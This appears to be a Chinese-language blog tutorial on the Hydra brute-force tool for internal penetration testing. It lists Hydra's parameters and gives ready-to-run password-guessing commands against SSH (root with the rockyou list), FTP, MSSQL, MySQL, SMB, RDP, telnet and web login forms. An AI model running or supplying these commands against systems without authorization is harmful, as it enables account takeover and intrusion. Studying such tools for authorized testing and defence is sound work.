爆破神器 Hydra 的使用

爆破神器 Hydra 的使用

Hydra 是我在内网渗透中破解 mssql，mysql，ssh，ftp，smb 等账号密码常用的一款工具。

它的功能十分强大，支持很多协议的破解甚至于可以破解没有验证码的web登录。

下载地址：

Windows：https://github.com/maaaaz/thc-hydra-windows

Linux：https://github.com/vanhauser-thc/thc-hydra（这款工具在 kali Linux 中自带）

常用参数详解：

-R	根据上一次的进度继续破解
-I	忽略现有的恢复文件（不要等待 10 秒）
-S	使用SSL协议连接
-s	指定服务端口（如果端口不是默认的话使用）
- l	指定用户名，-L 指定用户名字典
-p	指定密码，-P 指定密码字典
-x	密码暴力生成，键入“-x - h" 获取帮助
-y	禁止在暴力破解中使用符号
-e ns	n：空密码试探 s:使用指定用户和密码试探
-u	围绕用户循环，而不是密码（有效! 用 -x 暗示）
-C	用户名可以用 : 分隔(username:password) 可以代替 -l username -p password
-M	指定目标列表文件一行一条
-o	指定结果输出文件
-b	指定结果输出文件的格式（默认为：txt）
-f / -F	在使用 -M 参数以后，找到第一对登录名和密码后停止爆破
-t	指定多线程数量（默认为 16 个线程）
-T	指定多线程的并发数量（默认为 64）
-w / -W	设置最大超时的时间，单位秒（默认是30s）
-c	设置每次登录尝试的等待时间
-4 / -6	使用 IPv4（默认）/IPv6 地址
-v / -V / -d	详细模式 / 每次尝试显示登录 + 通行证 / 调试模式
-O
-q	不打印有关连接错误的消息
-U	服务模块使用详情
-h	更多命令行选项 (COMPLETE HELP)

常用服务爆破示例

SSH

hydra -l root -P /usr/share/wordlists/rockyou.txt -t 1 -vV -e ns -f 192.168.0.25 ssh

FTP

hydra -l 用户名 -P 密码字典 -vV -e ns IP地址 ftp

MSSQL

hydra -l administrator -P 密码字典 -vV -e ns IP地址 mssql

MYSQL

hydra -l administrator -P 密码字典 -vV -e ns IP地址 mysql

SMB

hydra -l administrator -P 密码字典 -vV -e ns IP地址 smb

RDP

hydra -l administrator -P 密码字典 -vV -e ns IP地址 rdp

TELENT

hydra -l administrator -P 密码字典 -vV -e ns IP地址 telent

爆破web登录

get方式提交

hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交

hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:"

https破解

hydra -m /index.php -l admin -P password.txt 192.168.0.132 https